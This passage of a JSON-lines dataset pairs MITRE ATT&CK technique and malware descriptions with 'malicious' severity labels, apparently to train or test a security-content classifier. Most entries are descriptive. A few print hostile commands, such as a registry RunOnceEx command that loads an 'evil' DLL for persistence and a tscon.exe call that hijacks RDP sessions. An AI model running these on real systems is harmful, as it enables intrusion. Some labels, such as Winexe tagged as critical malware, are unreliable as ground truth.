certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1588.004", "technique_name": "Digital Certificates", "tactics": ["resource-development"]}}]}
{"id": "mitre_00405", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# IPsec Helper\n\nType: malware\nPlatforms: Windows\n\n[IPsec Helper](https://attack.mitre.org/software/S1132) is a post-exploitation remote access tool linked to [Agrius](https://attack.mitre.org/groups/G1030) operations. This malware shares significant programming and functional overlaps with [Apostle](https://attack.mitre.org/software/S1133) ransomware, also linked to [Agrius](https://attack.mitre.org/groups/G1030). [IPsec Helper](https://attack.mitre.org/software/S1132) provides basic remote access tool functionality such as uploading files from victim systems, running commands, and deploying additional payloads.(Citation: SentinelOne Agrius 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "IPsec Helper", "malware_type": "malware"}}]}
{"id": "mitre_00406", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DNS\n\nTechnique: T1071.004\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows, Network Devices, ESXi\n\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)\n\nDNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e.\u202f[Protocol Tunneling](https://attack.mitre.org/techniques/T1572)). The commands may be embedded into different DNS records, for example, TXT or A records.(Citation: OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government) DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices.(Citation: DNS Beacons) Infrequent communication conceals the malicious DNS traffic with normal DNS traffic. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1071.004", "technique_name": "DNS", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00407", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Input Prompt\n\nTechnique: T1141\nTactics: credential-access\nPlatforms: macOS, Windows\n\nWhen programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1141", "technique_name": "Input Prompt", "tactics": ["credential-access"]}}]}
{"id": "mitre_00408", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Amadey\n\nType: malware\nPlatforms: Windows\n\n[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Amadey", "malware_type": "malware"}}]}
{"id": "mitre_00409", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Registry Run Keys / Startup Folder\n\nTechnique: T1547.001\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in e", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.001", "technique_name": "Registry Run Keys / Startup Folder", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00410", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Mafalda\n\nType: malware\nPlatforms: Windows\n\n[Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Mafalda", "malware_type": "malware"}}]}
{"id": "mitre_00411", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# IceApple\n\nType: malware\nPlatforms: Windows\n\n[IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "IceApple", "malware_type": "malware"}}]}
{"id": "mitre_00412", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hide Artifacts\n\nTechnique: T1564\nTactics: defense-evasion\nPlatforms: Linux, Office Suite, Windows, macOS, ESXi\n\nAdversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1564", "technique_name": "Hide Artifacts", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00413", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Modify Cloud Compute Infrastructure\n\nTechnique: T1578\nTactics: defense-evasion\nPlatforms: IaaS\n\nAn adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1578", "technique_name": "Modify Cloud Compute Infrastructure", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00414", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data from Local System\n\nTechnique: T1005\nTactics: collection\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1005", "technique_name": "Data from Local System", "tactics": ["collection"]}}]}
{"id": "mitre_00415", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ComRAT\n\nType: malware\nPlatforms: Windows\n\n[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ComRAT", "malware_type": "malware"}}]}
{"id": "mitre_00416", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RDP Hijacking\n\nTechnique: T1563.002\nTactics: lateral-movement\nPlatforms: Windows\n\nAdversaries may hijack a legitimate user\u2019s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1563.002", "technique_name": "RDP Hijacking", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00417", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# QUIETCANARY\n\nType: malware\nPlatforms: Windows\n\n[QUIETCANARY](https://attack.mitre.org/software/S1076) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.(Citation: Mandiant Suspected Turla Campaign February 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "QUIETCANARY", "malware_type": "malware"}}]}
{"id": "mitre_00418", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Keylogging\n\nTechnique: T1056.001\nTactics: collection, credential-access\nPlatforms: Linux, macOS, Network Devices, Windows\n\nAdversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1056.001", "technique_name": "Keylogging", "tactics": ["collection", "credential-access"]}}]}
{"id": "mitre_00419", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ShimRat\n\nType: malware\nPlatforms: Windows\n\n[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name \"[ShimRat](https://attack.mitre.org/software/S0444)\" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ShimRat", "malware_type": "malware"}}]}
{"id": "mitre_00420", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DLL\n\nTechnique: T1574.001\nTactics: persistence, privilege-escalation, defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)\n\nSpecific ways DLLs are abused by adversaries include:\n\n### DLL Sideloading\nAdversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).\n\nSide-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.\n\nAdversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)\n\nAdversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware\u2019s behavior. Another method implements a \u201cloader-for-a-loader\u201d, where a malicious DLL\u2019s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos)\n\n### DLL Search Order Hijacking\nAdversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)\n\n### DLL Redirection\nAdversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)\n\n### Phantom DLL Hijacking\nAdversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DL", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1574.001", "technique_name": "DLL", "tactics": ["persistence", "privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00421", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DownPaper\n\nType: malware\nPlatforms: Windows\n\n[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DownPaper", "malware_type": "malware"}}]}
{"id": "mitre_00422", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# FakeM\n\nType: malware\nPlatforms: Windows\n\n[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "FakeM", "malware_type": "malware"}}]}
{"id": "mitre_00423", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Application or System Exploitation\n\nTechnique: T1499.004\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS\n\nAdversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.\n\nAdversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1499.004", "technique_name": "Application or System Exploitation", "tactics": ["impact"]}}]}
{"id": "mitre_00424", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KeyBoy\n\nType: malware\nPlatforms: Windows\n\n[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KeyBoy", "malware_type": "malware"}}]}
{"id": "mitre_00425", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BabyShark\n\nType: malware\nPlatforms: Windows\n\n[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BabyShark", "malware_type": "malware"}}]}
{"id": "mitre_00426", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Upload Malware\n\nTechnique: T1608.001\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)(Citation: Guardio Etherhiding 2023)(Citation: Bleeping Computer Binance Smart Chain 2023)\n\nAdversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typo-squatting legitimate software, may increase the chance of users mistakenly executing these files. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1608.001", "technique_name": "Upload Malware", "tactics": ["resource-development"]}}]}
{"id": "mitre_00427", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Shutdown/Reboot\n\nTechnique: T1529\nTactics: impact\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) They may also include shutdown/reboot of a virtual machine via hypervisor / cloud consoles or command line tools.\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may also use Windows API functions, such as `InitializeSystemShutdownExW` or `ExitWindowsEx`, to force a system to shut down or reboot.(Citation: CrowdStrike Blog)(Citation: Unit42 Agrius 2023) Alternatively, the `NtRaiseHardError`or `ZwRaiseHardError` Windows API functions with the `ResponseOption` parameter set to `OptionShutdownSystem` may deliver a \u201cblue screen of death\u201d (BSOD) to a system.(Citation: SonicWall)(Citation: NtRaiseHardError)(Citation: NotMe-BSOD) In order to leverage these API functions, an adversary may need to acquire `SeShutdownPrivilege` (e.g., via [Access Token Manipulation](https://attack.mitre.org/techniques/T1134)).(Citation: Unit42 Agrius 2023)\n In some cases, the system may not be able to boot again. \n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1529", "technique_name": "System Shutdown/Reboot", "tactics": ["impact"]}}]}
{"id": "mitre_00428", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Launch Daemon\n\nTechnique: T1160\nTactics: persistence, privilege-escalation\nPlatforms: macOS\n\nPer Apple\u2019s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n \nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.\n \nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon\u2019s executable and gain persistence or Privilege Escalation.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1160", "technique_name": "Launch Daemon", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00429", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Web Shell\n\nTechnique: T1505.003\nTactics: persistence\nPlatforms: Linux, macOS, Network Devices, Windows\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1505.003", "technique_name": "Web Shell", "tactics": ["persistence"]}}]}
{"id": "mitre_00430", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Winexe\n\nType: tool\n\n[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: \u00dcberwachung APT28 Forfiles June 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Winexe", "malware_type": "tool"}}]}
{"id": "mitre_00431", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SLIGHTPULSE\n\nType: malware\nPlatforms: Network Devices, Linux\n\n[SLIGHTPULSE](https://attack.mitre.org/software/S1110) is a web shell that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) entities.(Citation: Mandiant Pulse Secure Zero-Day April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SLIGHTPULSE", "malware_type": "malware"}}]}
{"id": "mitre_00432", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DustySky\n\nType: malware\nPlatforms: Windows\n\n[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DustySky", "malware_type": "malware"}}]}
{"id": "mitre_00433", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Software Packing\n\nTechnique: T1027.002\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.002", "technique_name": "Software Packing", "tactics": ["defense-evasion"]}}]}
